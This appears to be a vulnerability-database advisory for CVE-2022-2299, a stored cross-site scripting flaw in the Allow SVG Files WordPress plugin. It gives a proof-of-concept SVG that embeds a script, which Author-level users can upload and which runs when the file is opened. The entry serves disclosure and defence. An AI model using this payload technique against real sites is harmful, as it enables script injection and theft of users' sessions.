Allow SVG Files <= 1.1 – Author+ Stored Cross Site Scripting via SVG | CVE 2022-2299 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads

Proof of Concept

As an author or above, upload the below SVG file via the Media library:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert(/XSS/);
</script>
</svg>

The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg

Affects Plugins

asf-allow-svg-files

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Luan Pedersini

Submitter

IBLISS Digital Security

Submitter website

https://ibliss.com.br

Verified

Yes

WPVDB ID

29015c35-0470-41b8-b197-c71b800ae2a9

Timeline

Publicly Published

2022-07-04 (about 3 years ago)

Added

2022-07-04 (about 3 years ago)

Last Updated

2023-04-07 (about 2 years ago)

Other

Published

Title

Published

2024-02-12

Title

PB oEmbed HTML5 Audio <= 2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode

Published

2022-12-21

Title

Sidebar Widgets by CodeLights <= 1.4 - Contributor+ Stored XSS

Published

2023-01-17

Title

Widget Shortcode <= 0.3.5 - Contributor+ Stored XSS

Published

2024-03-15

Title

Gutenberg Blocks by Kadence Blocks < 3.2.26 - Contributor+ Stored XSS

Published

2025-10-10

Title

WoodMart < 8.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting